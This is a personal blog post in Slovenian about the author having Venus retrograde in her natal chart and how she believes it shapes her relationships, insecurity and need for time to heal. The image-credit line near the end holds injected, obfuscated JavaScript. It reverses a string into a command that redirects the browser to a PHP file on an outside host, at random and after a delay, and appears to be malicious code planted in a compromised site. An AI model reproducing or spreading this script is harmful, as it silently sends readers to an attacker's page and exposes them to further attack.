Venerin retrograd v natalni karti

Izvedela sem, da je Venerin retrograd v moji natalni karti, danes pa sem si končno še prebrala povezavo, ki mi jo je poslala H. in šokirana sem. Vse je res. Zelo se pozna ta pozicija Venere ob mojem rojstvu in zdaj mi je marsi kaj bolj jasno.

Tukaj bi rada na kup spravila vse lastnosti, ki jih imam po Venerinem retrogradu ob rojstvu.

Pogovor jemljem resno in nikoli površinsko. Površinskih pogovorov ne prenesem, ker mi dajejo občutek izgube časa.

V razmerjih delujem destruktivno do sebe, saj izgubim samospoštovanje. Velikokrat verjamem in čutim, da nisem dovolj vredna, dobra,… Sem precej negotova in si težko izkazujem pravo mero ljubezni.

Razmerja naj bi nas naredila ali uničila in v mojem primeru je to vedno držalo. V Razmerje verjamem globoko in imajo name močan vpiv. Po končanem razmerju potrebujem ogroooomno časa, da se čustveno postavim nazaj na noge. Razmerju dajem nenavadno vrednost, kar pa drugi ljudje pogosto ne razumejo, ker ne vidijo moje ideje, v katero močno verjamem. Ko pride do razmišljanja o odnosu, je to resnično globoko, kar posledično pomeni, da vidim več pomankljivosti in napak, ki jih drugi sicer ne bi. To lahko postane moreče, ker sem pogosto napačno razumljena.

Včasih me je težko ljubiti, ker sem iz preteklosti prinesla strah in potrebe, ki so se navezovale na prvo razmerje. Znano je, da so osebe rojene v Venerinem retrogradu ali imele težko otroštvo, ali se zgodaj spustile v “resno” razmerje. Zame velja drugo; prvega fanta sem imela pri trinajstih, skupaj sva bila več kot dve leti. Iz tega razmerja sem res prinesla ogromno negativnih spominov, ki se odražajo še danes. Torej je res tudi to, da potrebujem ogromno časa, da se čustveno postavim na noge.

Lahko bi napisala še kaj, a sem se odločila, da se omejim zgolj na ljubezen, ker je Venera planet ljubezni in bi se rada naučila ravno tega.

Zdaj mi je še malo bolj jasno zakaj sem taka kot sem. Kot mi je rekla H., moja pot ni lahka. Res nikoli ni bila. Zato pa bo vredna.

Baje, da ljudje rojeni ob Venerinemu retrogradu ne občutimo teh 40 dni tako intenzivno… Jaz jih, še kako. Če ste se morda spraševali zakaj sem čudna. Zato.

Z Ljubeznijo;
(Ni)Si

Prikazana slika:$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/self-sabotage?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash

*Note to myself*

It is especially important for Venus retrograde people to avoid looking for happiness outside of themselves. Create happiness within, take responsibility for your own happiness, and then the love that you deserve will come to you.